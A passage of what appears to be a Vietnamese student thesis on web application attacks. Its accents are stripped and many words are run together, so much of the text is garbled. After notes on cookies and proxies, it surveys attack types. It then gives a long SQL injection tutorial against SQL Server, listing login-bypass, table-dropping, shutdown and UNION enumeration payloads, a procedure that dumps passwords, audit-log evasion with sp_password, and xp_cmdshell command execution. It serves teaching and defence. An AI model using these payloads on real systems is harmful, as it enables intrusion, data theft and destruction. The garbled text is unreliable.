sg=ALkJrhjYWtEg-dE3ZfFMowsZyz0YRZaAqwhttp://translate.googleusercontent.com/translate_c?hl=vi&sl=en&u=http://en.wikipedia.org/wiki/Internet_Engineering_Task_Force&prev=/search%3Fq%3Dhttp%2Bheader%26hl%3Dvi%26biw%3D994%26bih%3D603&rurl=translate.google.com.vn&usg=ALkJrhhcR7ofw-t8ByYbEic_vKAVPBMgSg -
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
21/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
2.1.3.4 COOKIE
L mt phn d liu nh c cu trc c chia s gia trnh ch v trnh duyt
ngi dng.
Cc cookie c lu tr di dng nhng file d liu nh dng text , c ng
dng to ra lu tr truy tm nhn bit nhng ngi dng gh thm trang web v
nhng vng h ngang qua trang. Nhng thng tin nay c th bao gm thng tin
ngi dng, ti khon, mt khucookie c trnh duyt ca ngi dng chp nhn
lu trn a cng ca mnh . Nhiu trnh duyt khng t ng lu tr cookie m cn
ph thuc vo ngi dng c chp nhn lu n hay khng.
Nhng ln truy cp sau vo trang web ng ng dng c th s dng li
nhng thng tin trong cookie(cc thgn tin tai khon lin quan) m ngi dng khng
cn phi ng nhp hay cung cp thm thng tin g c.
C nhiu cch phn loi cookie, phn loi theo i tng thit lp ca
cookie.th cookie chia lm 2 loi: Cookie ca bn th nht l cookie c thit lp bi
tn min trang web c lit k trong thanh a ch. Cookie ca bn th ba n t cc
ngun tn min khc c cc mc, chng hn nh qung co hoc hnh nh, c nhngvo trang. Ngoi ra cn cch chia chia khc chia cookie thnh 4 loi v c secure/non-
secure v perisent/non- perisent nn ta c:
-Persistent v Secure
-Persistent v Non-Secure
- Non-Persistent v Secure
- Non-Persistent v Non-Secure Persistent cookies c lu tr di dng tp tin .txt (v d trnh duyt
NetscapeNavigator s lu cc cookie thnh mt tp tin cookie.txt cn Internet
Explorer s lu thnh nhiu tp tin *.txt trong mi tp tin l mt cookie) trn
my khch trong mtkhon thi gian xc nh.
SV :Nguyn Vn i 21
-
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
22/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
Non-persistent cookie th c lu tr trn b nh RAM ca my khch v s b
hy khi ng trang web hay nhn c lnh hy t trang web.
Secure cookies ch c th c gi thng qua HTTPS (SSL).
Non-Secure cookie c th c gi bng c hai giao thc HTTPS hay HTTP.
Thccht l i vi secure cookie th trnh ch s cung cp ch truyn bo
mt.
Cc thnh phnca mt cookie gm:
1. Domain: Tn min ca trang web to cookie ( trong v d trn
2. Flag: mang gi tr TRUE/FALSE - Xc nh cc my khc vi cng tn
min c c truy xut n cookie hay khng.3. Path: Phm vi cc a ch c th truy xutcookie.V d: Nu path l
/tracuu th cc a ch trong th mc /tracuu cng nh tt c cc th
mc con ca n nh /tracuu/baomat c th truy xut n cookie ny. Cn
nu gi tri l / th cookie s c truy xutbitt c a ch
thucmintrang web to cookie.
4. Sercure: mang gi tr TRUE/FALSE - Xc nh y l mt secure cookie
hay khng ngha l kt ni c s dng SSL hay khng.
5. Expiration:thi gian ht hn ca cookie, c tnh bng giy k t
00:00:00 gi GMT ngy 01/01/1970. Nu gi tr ny khng c thit
lp th trnh duyt s hiu y l non-persistent cookie v ch lu trong b
nh RAM v s xo n khi trnh duyt b ng.
6. Name:Tn bin (trong trng hp ny l Apache)
7. Value: Vi cookie c to trn th gi tr ca Apache l64.3.40.151.16018996349247480 v ngy ht hn l 27/07/2006, ca tn
min http://www.redhat.com.
- Cc cookie ca Netscape (NS) t trong mt tp tin Cookies.txt, vi ng dnCc
cookie ca Netscape (NS) t trong mt tp tin Cookies.txt, vi ng dn
SV :Nguyn Vn i 22
-
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
23/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
l: C:\Program Files\Netscape\Users\UserName\Cookies.tx
-Cc cookies ca IE c lu thnh nhiu tp tin, mi tp tin l mt cookie v
c t trong [C:]\Documents and Setting\[username]\Cookies (Win2000), i
vi win9x, th mc cookies nm trong th mc [C:]\Windows\cookies.
-Kch thc ti a ca cookie l 4kb. S cookie ti a cho mt tn min l 20 cookie.
Cookie b hy ngay khi ng trnh duyt gi l session cookie .
Bn cn bit v ci t cookie v cookie c th cho php cc trang web theo di
iu hng ca bn khi bn truy cp vo cc trang web .
2.1.3.5 PROXY
Proxy cung cp cho ngi s dng truy xut Internet nhng nghi thc t bit
hoc mt tp nhng nghi thc thc thi trn dual_homed host hoc basion host. Nhng
chng trnh client ca ngi s dng s qua trung gian proxy server thay th cho
server tht s m ngi s dng cn giao tip.
Proxy server xc nh nhng yu cu t client v quyt nh p ng hay khng
p ng, nu yu cu c p ng, proxy server s kt ni vi server tht thay cho
client v tip tc chuyn tip nhng yu cu t client n server, cng nh tr lica
server n client. V vy proxy server ging cu ni trung gian gia server v client.
SV :Nguyn Vn i 23
-
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
24/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
CHNG 3:CC K THUT TN CNG NG WEB
C BN
A. L thuyt
1. KIM SOT TRUY CP WEB (Web Access Control)
Thm nhp h thng qua ca sau (Back door)
Trong qu trnh thit k ng dng, nhng ngi pht trin ng dng c th ci
mt ca sau (back door) sau ny c th thm nhp vo h thng mt cch d
dng.
2. CHIM HU PHIN LM VIC(Session Mangement)
1.1 n nh phin lm vic (Session Fixation)
L k thut tn cng cho php hacker mo danh ngi dng hp l bng cch
gi mt session ID hp l n ngi dng, sau khi ngi dng ng nhp vo h
thng thnh cng, hacker s dng li session ID v nghim nhin tr thnh
ngi dng hp l.
2.2 nh cp phin lm vic (Session Hijacking)
L k thut tn cng cho php hacker modanh ngi dng hp l sau khi nn
nhn ng nhp vo h thng bng cch gii m session ID ca h c lu
tr trong cookie hay tham s URL, bin n ca form.
3 LI DNG THIU ST TRONG VIC KIM TRA DLIU HP L (INPUT VALIDATION)
Hacker lidng nhng nhp d liu gi i mt on m bt k khin cho h
thng phi thc thi on lnh hay b ph v hon ton.
3.1 Kim tra tnh ng n ca d liu bng ngn ng pha trnh duyt
SV :Nguyn Vn i 24
-
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
25/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
(Client-Side validation)
Do ngn ng pha trnh duyt ( JavaScript, VBScript..) uc thc thi trn trnh
duyt nn hacker c th sa i m ngun c th v hiu ha s kim tra.
3.2 Trn b m (Buffer OverFlow)
Mt khi lng d liu c gi cho ng dng vt qu lng d liu c cp
pht khin cho ng dng khng thc thi c cu lnh d nh k tip m thay vo
phi thc thi mt on m bt k do hacker a vo h thng. Nghim trng hn nu
ng dng c cu hnh thc thi vi quyn root trn h thng.
3.3 M ho URL (URL Encoding)
Li dng chun m ha nhng k tc bit trn URL m hacker s m ho tng nhng k t bt hp l-nhng k t b kim tra bng ngn ng kch bn- vt
qua vng kim sot ny.
3.4 K t Meta (Meta-characters S dng nhng k t c bitHacker c th chnthm vo d liu gi nhng k t trong chui cu lnh nh
trong k thut XSS, -- trong SQL. thc thi cu lnh.
3.5 Vt qua ng dn (Path Traversal):
L phng php li dng ng dn truy xut mt tp tin trn URL tr kt
qu v cho trnh duyt m hacker c th ly c ni dung tp tin bt k trn h thng.
3.6 Chn m lnh thc thi trn trnh duyt nn nhn
(Cross- Site Scripting):
y l k thut tn cng ch yu nhm vo thng tin trn my tnh ca ngi
dng hn l vo h thng my ch. Bng cch thm mt on m bt k ( thng c
lp trnh bng ngn ng kch bn nh JavaScript, VBScript), hacker c th thc hin
vic nh cp thng tin quan trng nh cookie t tr thnh ngi dng hp l
ca ng dngda trn nhng thng tin nh cp ny. Cross- Site scripting cng l
mt kiu tn cng session hijacking.
3.7 Thm cu lnh h thng (OS Command Injection)
SV :Nguyn Vn i 25
-
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
26/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
Kh nng thc thi c nhng cu lnh h thng hay nhng on m c thm
vo trong nhng tham s m khng c s kim tra cht ch nh tham s ca form,
cookies, yu cu HTTP Header, v nhng d liu nguy him trong nhng tp tin c
a ln trnh ch. Thnh cng trong k thut ny gip hacker c th thc thi cnhng cu lnh h thng vi cng quyn ca trnh ch.
3.8 K t rng (Null Characters)
Li dng chui k t thng kt thc bng \0 m hacker thng thm vo
nh la ng dng v vi nhng ng dng s dng chng trnh dch nh C++ th C++
cho rng \0 l du kt thc chui. V d:
Hacker thm chui sau: nhp: ti th nht\0 alert(document.cookie)
Nu ng dng s dng chng trnh C++ kim tra tnh ng n ca chui
th chui trn hp l do C++ s nhn bit \0 l kt thc chui nn khng kim tra.
3.9 Chn cu truy vn SQL (SQL Injection)
Trong lp trnh vi c s d liu, ngi lp trnh sai st trong vn kim tra
gi tr nhp vo t hacker li dng thm vo nhng cu truy vn hay nhng gitr khng hp l d dng ng nhp vo h thng.
3.10 Ngn ng pha my ch (Server side includes)
L kh nng thm vo nhng cu lnh thuc h thng nh nhng file (include
file), truy xut c s d liu (jdbc)khin cho hacker c c hi truy xut n file, c
s d lium bnh thng khng th xem c trn Web site.
3.11 Thao tc trn tham s truyn (Parameter manipulation)
Nhng thng tin trao i gia trnh ch v trnh duyt c lu tr trong nhng
bin nh bin trn URL, bin n form, cookieBi v vic kim sot bin chac
quan tm ng mc nn hacker c th li dng sa i gi tr bin nh cp phin
lm vic ca ngi dng hay thay i gi tr mt mn hng.
SV :Nguyn Vn i 26
-
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
27/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
3.12 T chi dch v (Denial of service (DoS))
Mt khi lng ln yu cu c gi cho ng dng trong mt khong thi gian
nht nh khin h thng khng p ng kp yu cu dn n h thng b ph v.
B, Cc cch trin khai tn cng ng dng webPhn trc trong n trnh by s lc v cc cch tn cng ng dng web
c bn. Phn ny s ni c th hn mt s cch tn cn bn v ph bin
1. Thao tc trn tham s
Thao tc trn tham s truyn l k thut thay i thng tin quan trng trn
cookie, URLhay bin n ca form. K thut Cross-Site Scripting, SessionID, SQL
Injection, BufferOverflowcng cn dng n cc tham s ny hon thin cc
bc tn cng cahacker. C th ni cc tham s truyn l u mi cho mi hot ng
ca hacker trong qu trnh tn cng ng dng. V th y l ni dung chng u tin
c cp trong phn ny , mc ch cng l h tr tt hn phn trnh by cc
phn k tip.
1.1 THAO TC TRN URL
1.1.1 Khi nimKhi nhp mt form HTML th kt qu s c gi i theo hai cch: GET hay
POST. Nu dng GET, th tt c cc tn bin v gi tr ca n s xut hin trong chui
URL.
1.1.2 Cch khc phc
chng li kiu thay i ni dung mt chui URL, ng dng c th p dng
bin php sau:
` ng dng s dng c ch bng bm (hash table). Sau khi ngi dng chng
thc thnh cng vi mt username , ng dng s sinh ra mt kho tng ng. Kho
ny s c lu trn server cng vi bin username trong i tng bng bm. Mi khi
ngi dng kt ni n ng dng, kho v username ny s c gi i v c so
SV :Nguyn Vn i 27
-
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
28/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
snh vi kho v username trong bng bm. Nu tng ng vi bn ghi trong d liu
th hp l. Cn nu khng th server bit rng ngi dng thay i URL.
Ngoi ra, vi nhng thng tin c gi tr, cn m ho thng tin ny trc khi
cho hin th trn trnh duyt trnh hacker c th sa i ty .
1.2. THAO TC TRN BIN N FORM
1.2.1 Khi nim
Thng tin c th c chuyn i thng qua mt bin n ca form, gi l
Hidden Form Field. Bin n form khng hin th trn mn hnh trnh duyt nhng
ngi dng c th tm thy ni dung ca n trong view source , v th y l mt
im yu hacker li dng bng cch lu ni dung trang web xung trnh duyt, thayi ni dung trang v gi n trnh ch.
Ngoi vic thay i ni dung bin n ca form, hacker cn bin i ni dung
cc thnh phn trong form, nh chiu di ca mt nhp d liu thc hin vic tn
cng BUFFER OVERFLOW,
1.2.2. Mt s bin php khc phc
Ch nn s dng bin n ca form hin th d liu trn trnh duyt, khng
c s dng gi tr ca bin thao tc trong x l ng dng.
Dng bin HTTP_REFERER kim tra ngun gc ca yu cu gi n, tuy
nhin hacker c th s dng Proxy che du ngun gc thc ca n, v vy cng
khng nn qu tin tng bin HTTP_REFERER kim tra.
Ghp tn v gi tr ca bin n thnh mt chui n. S dng thut ton m
ho MD5 hoc mt kiu hash mt chiu khc tng hp chui v lu n vo mt
hidden field gi l Chui mu.
Khi gi tr trong form c gi i, cc thao tc nh trn c thc hin li vi
cng mt kho m ta nh trc. Sau em so snh viChui mu, nu chng
khng khp nhau th chng t gi tr trong biu mu b thay i.
SV :Nguyn Vn i 28
-
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
29/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
Dng mt sessionID tham chiu n thng tin c lu tr trn c s d
liu.
2 K thut tn cng SQL Injection
2.1 Di y l k thut SQL injection n gin nht
Mc ch dng vt qua cc form ng nhp.
V d 1: gi s ng dng web c on m sau:
SQLQuery= SELECT tkUsername FROM User WHERE tkUsername= &
strUsername & AND Password= & tkPassword &
flag= GetQueryResult (SQLQuery)
if flag = then
check=FALSE
else
check=TRUE
end if
on m trn kim tra chui nhp Username v Password. Nu tn ti trong bng
User th check=true ngc li check=false.
Gi tri nhp vo l:
Username: OR =
Password: OR =
Cu lnh SQL lc ny nhsau:
SELECT tkUsername FROM User WHERE tkUsername= OR = ANDPassword= OR =
Cu lnh so snh trn lun lun ng (v lun bng ). Do cu iu kin
trong mnh WHERE lun ng. Gi tr tn ngi s dng ca dng u tin
trong bng s c chn.
SV :Nguyn Vn i 29
-
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
30/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
Kt hp vi k t c bit ca SQL :
k t ; : nh du kt thc 1 cu truy vn
k t -- : n chui k t pha sau n trn cng 1 dng
V d 2:
Username: ; drop table User--
Password:
Cu lnh SQL lc ny nh sau:
SELECT tkUsername FROM User WHERE tkUsername= ;drop table
User-- AND Password= & tkPassword &
Vi cu lnh trn th bng User s b xa hon ton.
V d 3: Mt v d khc s dng k t c bit SQL thm nhp vo h thng nh
sau:
Username : admin--
Password :
Cu lnh SQL nh sau:
SELECT tkUsername FROM User WHERE tkUsername= admin-- AND
Password= & tkPassword &
Cu lnh trn cho php ng nhp vo h thng vi quyn admin m khng i hi
password.
2.2. Tn cng da vo cu lnh SELECT
SV :Nguyn Vn i 30
-
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
31/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
Ngoi k thut n gin trn, vic tn cng thng da trn nhng thng bo li ly
thng tin v bng cng nh nhng trng trong bng. lm c iu ny, cn phi
hiu nhng thng bo li v t chnh sa ni dung nhp cho ph hp.
Direct Injection l nhng i s c thm vo trong cu lnh m khng nmgia nhng du nhy n hay du ngoc kp l trng hp direct injection. v hiu
ho du nhy v thay i cu lnh m vn gi c c php ng, chui m chn thm
vo phi c mt du nhy n trc chui k t c chn vo v cui cu lnh phi
c mt du nhy n, chng hn nh sau:
StrSQL=SELECT tkUsername FROM User WHERE tkUsername= and =
Nu thc hin nh trn m thng bo li c lin quan n du(th trong chui
chn vo phi c ):
V d 4: Gi s:
StrSQL=SELECT tkUsername FROM User WHERE (tkUsername=& tName& )
Th c php hp l nh sau:
StrSQL=SELECT tkUsername FROM User WHERE (tkUsername=) or =
Ngoi ra k t % thng c dng trong nhng trng hp tm kim thng tin.
V d 5:StrSQL=SELECT tkUsername FROM User WHERE tkUsername like %
& tName &
2.3. Tn cng da vo cu lnh HAVING
HAVING s dng cng chung vi mnh GROUP BY l phng php hu hiu
nhn thng tin bng, trng v s c bn su hn trong phn 4.
2.4. Tn cng da vo cu lnh kt hp UNION
Lnh SELECT c dng ly thng tin t c s d liu. Thng thng v tr c th
c chn thm vo mt mnh SELECT l sau WHERE. c th tr v nhiu
dng thng tin trong bng, thay i iu kin trong mnh WHERE bng cch chn
thm UNION SELECT.
V d 6:
SV :Nguyn Vn i 31
-
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
32/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
StrSQL=SELECT tkUsername FROM User WHERE tkUsername like % &
tName & UNION SELECT tkPassword from User
Cu lnh trn tr v mt tp kt qu l s kt hp gia tkUsername vi tkPassword
trong bng User.
Ghi ch:
S ct trong hai cu SELECT phikhp vi nhau. Ngha l s lng ct trong
cu lnh SELECT ban u v cu lnh UNION SELECT pha sau bng
nhau v cng kiu. Nh vo li c php tr v sau khi chn thm cu lnh UNION m
c th bit kiu ca mi trng. Sau y l nhng v d c thc hin khi khng bit
ni dung c s d liu da vo HAVING, GROUP BY, UNION:V d 7: Nhc li cu truy vn cn ng nhp:
SQLQuery= SELECT tkUsername,tkPassword
FROM User
WHER tkUsername= & strUsername & AND Password= & tkPassword&
u tin, bit tn bng v tn trng m cu truy vn s dng, s dng cu
iu kin having , nh v d sau: Gi tr nhp vo:Username:having 1=1--
Li pht sinh: [Microsoft][ODBC SQL Server Driver][SQL Server]Column
'User.tkUsername'is invalid in the select list because it is not contained in an aggregate
function and there is no GROUP BY
clause.
Nh vo li pht sinh ny m bit c bng s dng trong cu truy vn l User vtrong bng tn ti mttrng tn l tkUsername.
Sau s dng GROUP BY:
V d 8
Username: group by User.tkUsername having 1=1--
SV :Nguyn Vn i 32
-
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
33/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
Li pht sinh:
[Microsoft][ODBC SQL Server Driver][SQL Server] Column 'User.tkPassword' is
invalid in the select list because it is not contained in either an aggregate function or
the GROUP BYclause.
Nh vy tkPassword l mttrng ca bng User v c s dng trong cu truy vn.
Tip tc dng GROUP BY cho n khi bit c tt c cc trng trong bng User
tham gia vo cu truy vn.
Khi khng cn bo li c php GROUP BY na th chuyn qua cng on kim tra
kiu ca tng trng trong bng. Lc ny UNION c s dng:V d 9:
Username:union select sum(tkUsername) from User
Lnh sum l lnh tnh tng cho i s bn trong du ngoc. i s phi l kiu s.
Nu i s khng l kiu s th pht sinh li nh sau:
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate
operationcannot take a varchar data typeas an argument.Nh vy vi thng ip li nh trn th tkUsername chc chn phi l kiu varchar.
Vi phng php trn, d dng xc nh c kiu ca tng trng trong bng. Sau
khi nhn y trng tin trn th hacker d dng t thm thng tin vo
bng User.
V d 10
Username: ; insert into User(tkUsername,tkPassword) values(admin, )--
Hacker thm ni dung nh V d 6.III.4.2.4 by gi tr thnh ngi qun tr mng m
khng cnmt khu chng thc.
V d 11: minh ho mt cng on s gip hacker c ht thng tin trong bng User:
SV :Nguyn Vn i 33
-
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
34/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
Bc 1: To mt Stored procedure chp vo tt c thng tin ca 2 trng
tkUsername v tkPassword trong bng User thnh mt chui vo mt bng mi l foo
c mt trng l ret bng on m sau:
create proc testas
begin
declare @ret varchar(8000)
set @ret=':'
select @ret=@ret+' '+tkUsername+'/'+tkPassword from User
select @ret as ret into foo
end
Thc thi cu lnh bng cch nhp vo form.
Username:; Create proc test as begin declare @ret
varchar(8000) set @ret=: select @ret=@ret+'
'+tkUsername+'/'+tkPassword from User select @ret as ret into
foo
Bc 2: Gi Stored procedure
Sau khi to c stored procedure nh trn, thc hin li gi hm:
Username: ;exec test
Bc 3: Dng UNION xem ni dung bng foo
Username:; select ret,1 from foo union select 1,1 from foo
Li pht sinh:
Microsoft OLE DB Provider for ODBC Drivers error
'80040e07'[Microsoft][ODBC SQL Server Driver][SQL
Server]Syntax error convertingthe varchar value ':
SV :Nguyn Vn i 34
-
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
35/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
admin/passofAdmin nhimmap/passofnhimmap minhthu/passofminhthu'
To a column of data type int.
Qua mt s cng on, hacker thu c ni dung ca bng User gm c tn:
tkUsername v mt khu tkPassword.
Bc 4: Ngoi ra hacker cn c th cn thn xo bng foo xo du vt:
Username:; drop table foo--
V d 12: Cn y l mt cch khc xc nh ni dung ca bng User, cn mt
phng php tm kim thng tin nh sau:
Bc 1: Tm tun t tng dng trn bng User
Username:union select 1,1
hoc :
Username: union select min(tkUsername),1 from User where
tkUsername> a--
Li pht sinh:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error
converting the varchar value ' admin ' to a column of data type int.
Ngi u tin trong bng User l admin.
Bc 2: bit cc gi tr tip theo, nhp chui sau:
Username:;select min(tkUsername),1 from User where
tkUsername> adminunion select 1,1 from User
Li pht sinh:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
Error Converting the varchar value 'nhimmap' to a column of data type int.
SV :Nguyn Vn i 35
-
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
36/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
Bc 3: Thc hin nh bc 2 cho ra kt qu l tng dng vi trng
tkUsername trong bng User.
Bc 4: bit thm v tkPasswork, c th thc hin nh sau:
Username: ;select tkPassword,1 from User where tkUsername=admin
union select 1,1 from User
Li pht sinh:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error
Converting the varchar value ' passOfAdmin ' to a column of data type int.
bit thng tin v cc bng, ct trong c s d liu, c th truy vn bng n bng h
thng INFORMATION_SCHEMA.TABLES.
V d 13:
select TABLE_NAME from INFORMATION_SCHEMA.TABLES
INFORMATION_SCHEMA.TABLES cha thng tin v tt c cc table c trn server.
Trng TABLE_NAME cha tn ca mi table trong c s d liu.
SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNSWHERE
TABLE_NAME='User'
Cu lnh trn cs dng bit thng tin v ct trong bng. Ngoi ra cn c th
dng UNION bitcc bin mi trng ca SQL Server.
V d 14: bit ng dng ang chy trn Server no, c th xc nh bng
cch sau:Username: ;select @@SERVERNAME union select 1
Li pht sinh:
Microsoft OLE DB Provider for ODBC Drivers error
'80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
SV :Nguyn Vn i 36
-
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
37/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
error converting the varchar value ' KHOAI_NGU ' to a column of
data type int.
2.5. Tn cng da vo lnh INSERT
T kho INSERT dng a thng tin vo c s d liu. Thng thng cu
lnh INSERT c dng trong cc trng hp nh: thng tin ng k ngi s dng,
guestbookv..v
K thut ;, -- c dng nh tng dng vi cu lnh SELECT, phi m
bo ng s lng v kiu gi tr c nhp vo nhm trnh li v c php (nu khng
xc nh c kiu d liu c th nhp tt c l s).
V d 15:SQLString= INSERT INTO User VALUES ( & strUsername & , &
strName& , & strPassWord & ,& strLimitSize & )
2.6 Tn cng da vo STORED PROCEDURE
Stored Procedure c s dng trong lp trnh Web vi mc ch gim s phc tp
trong ng dng v trnh s tn cng trong k thut SQL Injection. Tuy nhin hacker
vn c th li dng nhng Stored Procedure tn cng vo h thng.V d 16: Stored procedure sp_login gm hai tham s l username v password. Nu
nhp:
Username: nhimmap
Password: ;shutdown--
Lnh gi stored procedure nh sau:
exec sp_login nhimmap,;shutdown--Lnh shutdown thc hin dng SQL Server ngay lp tc.
2.7. Mt s k thut tn cng b xung
2.7.1 Chui k t khng c du nhy n
SV :Nguyn Vn i 37
-
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
38/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
Nhng nh lp trnh c th bo v ng dng ca h bng cch loi b tt c du
nhy, thng thng loi b du nhy bng cch thay mt du nhy thnh 2 du nhy.
V d 17
Function escape (input)
Input=replace(input, , )
escape=input
end function
R rng l, n ngn chn c tt c nhng kiu tn cng trn. Tuy nhin nu mun
to ra mt chui gi tr m khng dng cc du nhy, c th dng hm char() nh v
d sau: V d 18:INSERT into User VALUES(666, char(0x63) +char(0x68)
+char(0x72) char(0x69) +char(0x73) ,char(0x63) +char(0x68)
+char(0x72) +char(0x69) +char(0x73),0xffff)
V d 19 trn tuy l mt cu truy vn khng c du nhy n no nhng n vn c th
insert chui vo bng, v tng ng vi:
INSERT into User VALUES( 666,chris,chris,255)Hacker cng c th chn username , password l strnh du nhy nh v d sau: V
d 20
INSERT into User VALUES( 667,123,123,0xffff)
SQL server s t ng chuyn t s sang chui.
2.7.2 Tn cng 2 tng
Mc d ng dng thay th du nhy n nhng vn cn kh nng b chn on mSQL .
V d 21: ng k account trong ng dng, nhp username nh sau:
Username : admin'
Password: passofadmin
SV :Nguyn Vn i 38
-
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
39/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
ng dng s thay th du nhy, kt qu trong cu insert s nh sau:
INSERT into User VALUES(123, 'admin''--', 'password',0xffff)
(nhng trong c s d liu s lu l admin-- )
Gi s rng ng dng cho php ngi dng thay i mt khu. Cc on m ASP c
thit k m bo rng ngi s dng phi nhp ng mt khu c trc khi nhp mt
khu mi. on m nh sau:
username = escape( Request.form("username") );
oldpassword = escape( Request.form("oldpassword") );
newpassword = escape( Request.form("newpassword") );
var rso = Server.CreateObject("ADODB.Recordset");
var sql = "select * from users where username = '" + username
+ "' and password = '" + oldpassword + "'";
rso.open( sql, cn );
if (rso.EOF)
{
Cu truy vn thit lp mt khu mi nh sau:
sql = "update users set password = '" + newpassword +
"' where username= '" + rso("username") + "'"
rso(username) chnh l gi tr username c c cu truy vn login v n l admin--
Cu truy vn lc ny nh saupdate users set password = 'password' where username =
'admin'--'
Nh hacker c th thay i mt khu ca admin bng gi tr ca mnh. y l
1 trng hp cn tn ti trong hu ht nhng ng dng ln ngy nay c s dng c ch
loi b d liu. Gii php tt nht l loi b nhng gi tr li hn l chnh sa li.
Nhng c mt vn l c mt s nhp d liu (nh nhp tn) cho php nhng k
SV :Nguyn Vn i 39
-
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
40/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
t ny. V d: OBrien. Cch tt nht gii quyt vn ny l khng cho php nhp
du nhy n. Nu iu ny khng th thchin c , th loi b v thay th nh trn.
Trong trng hp ny, cch tt nht l m bo tt c d liu c a vo cu
truy vn SQL (k c nhng gi tr trong c s d liu) phi c kim sot mt cchcht ch.
Mt s ng dng phng chng vic thm cu truy vn t ngi dng bng cch
gii hn chiu di ca nhp. Tuy nhin, vi gii hn ny th mt s kiu tn cng
khng th thc hin c nhng vn c ch h hacker li dng.
V d 22: Gi s c username v password u b giihn ti a l 16 k t.Nhp:
Username: aaaaaaaaaaaaaaa
Password : ; shutdown--
ng dng s thay th mt du nhy n bng hai du nhy n nhng do chiu di
chui b gii hn ch l 16 k t nn du nhy n va c thm sb xo mt. Cu
lnh SQL nh sau:
Select * from users where username=aaaaaaaaaaaaaaa and
password=; shutdown
kt qu l username trong cu lnh c gi tr l:
aaaaaaaaaaaaaaa and password=
2.7.3 Trnh s kim sot:
SQL server c mt giao thc kim sot cht ch bng h hm sp_traceXXX, cho php
ghi nhn nhiu s kin xy ra trong c s d liu. c bit l cc s kin T-SQL, ghi
nhn li tt c cc cu lnh SQL thc hin trn Server. Nu ch kim sot c bt
th tt c cc cu truy vn SQL ca hacker cng b ghi nhn v nh m mt ngi
qun tr c th kim sot nhng g ang xy ra v nhanh chng tm ra c gii php.
Nhng cng c mt cch chng li iu ny, bng cch thm dng sp_password
vo cu lnh T-SQL, v khi gp chui ny th vic kim tra s ghi nhnnh sau:
-- sp_password was found in the text of this event.
SV :Nguyn Vn i 40
-
8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744
41/55
n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun
-- The text has benn replaced with this comment for security reasons.
ngay c khi sp_password xut hin trong phn ch thch. V th du tt c cu
truy vn tn cng, ch cn n ginl thm:
sp_password vo sau -- nh sau:
Username: admin--sp_password
2.7.4 Dng Extended Stored Procedure c sn trong h thng
SQL Server
Nu ci SQL Server ch mc nh th SQL Server chy trn nn
SYSTEM, tng ng mc truy cp Windows. C th dng
master..xp_cmdshell thi hnh lnh t xa: ; exec master..xp_cmdshell 'ping
10.10.1.2'--
Th dng du nhy i (") nu du nhy n (') khng lm vic.
Di y l mt s extended stored procedure m hacker thng hay s
dng thc thi nhng cu lnh xem ni dung thng tin trong my nn
nhn:
Xp_availablemedia hin th nhng a hin hnh trn my
Xp_dirtree hin th tt c cc th mc k c th mc con
